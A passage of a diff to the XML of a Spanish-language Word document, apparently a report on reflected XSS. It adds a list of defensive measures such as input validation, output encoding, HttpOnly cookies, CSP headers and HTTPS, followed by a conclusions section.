           <w:ilvl w:val="0"/>
-          <w:numId w:val="33"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Validar y san</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ear</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> todas las entradas del usuario</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>, asegurando</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> que solo se puedan incluir archivos permitidos.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Prrafodelista"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Usar antivirus o similar y mantenerlos actualizados.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Prrafodelista"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Tener todas las aplicaciones actualizadas, especialmente los navegadores web.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Prrafodelista"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Uso de herramientas que ayuden a la detección y bloqueo de esto ataques (WAF, Anti-XSS, etc)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Prrafodelista"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Habilitar el “HttpOnly” en las cookies que contienen información importante o sensible, impidiendo que el su contenido sea accesible por JavaScript, reduciendo el riesgo de XSS.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Prrafodelista"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Configurar el servidor para restringir el acceso a archivos sensibles</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>, asegurando que</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> los archivos críticos no sean accesibles desde la web.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Prrafodelista"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Usar el “Output Encoding”, proceso qu</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">e convierte caracteres especiales en una forma segura antes de su representación en la web, usando </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>en los</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> datos de salida del usuario métodos como el HTML Encoding, previniendo que el navegador interprete el contenido del usuario como código de la web.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Prrafodelista"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Uso del HTTPs como mecanismo de comunicación entre navegador y servidor. ayudando a prevenir que los ataques XSS intercepten y modifiquen las comunicaciones.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Prrafodelista"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Uso de funciones como “Htmlspecialchars” o “ENT_QUOTES” para mantener la entrada controlada, no dejando escapar ningún carácter que pueda ser usado para un ataque de inyección de código.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Prrafodelista"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Usar las cabeceras seguras de CSP, pudiendo incluir que solo se permita código JavaScript desde la fuente, rechazando cualquier otro que provenga no provenga de este. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Prrafodelista"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="38"/>
         </w:numPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
           <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Utilizar listas blanca</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>s, para p</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>ermitir solo archivos específicos que sean seguros.</w:t>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>CONCLUSI</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>ÓN</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>ES</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="357"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>Después de analizar los ataques XSS Reflected y las medidas de seguridad para prevenirlos, podemos concluir que la protección contra estos ataques requiere una combinación de prácticas efectivas y una conciencia constante de los riesgos y las vulnerabilidades emergentes. A continuación, se presentan los puntos más importantes para recordar:</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="47"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>La validación y sanitización de entradas son fundamentales para su prevención, debiendo asegurarse que las entradas del usuario se ajusten a las reglas y patrones esperados y así, eliminen cualquier carácter o secuencia de caracteres que no sean necesarios o que puedan ser utilizados para inyectar código JavaScript.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="47"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>La política de seguridad de contenido (CSP) es un mecanismo de seguridad que permite a los desarrolladores definir qué fuentes de contenido web son seguras para una aplicación</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>, ayudando a pr</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>evenir que los navegadores carguen contenido malicioso.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="47"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Asegurarse </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>que las cookies que contienen información sensible</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (inicios de sesión, etc)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> estén marcadas con el atributo </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>HttpOnly</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>impid</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>iendo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> que el contenido de la cookie sea accedido por JavaScript, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>reduciendo el riesgo de estos ataques.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="47"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve">El Encoding de salida es el proceso de convertir caracteres especiales en una forma </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>de</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> representación </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve">segura </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve">en una página web. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Por lo que el uso </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve">como HTML </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>E</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>ncoding</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>, ayudará a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> prevenir que el navegador interprete el contenido como código</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> malicioso.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="47"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Implementar medidas de educación y concienciación entre </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>los desarrolladores y otros miembros del equipo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, para que </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>comprendan los riesgos de XSS Reflected y cómo prevenirlo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>s.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="47"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>Realiza</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>r</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
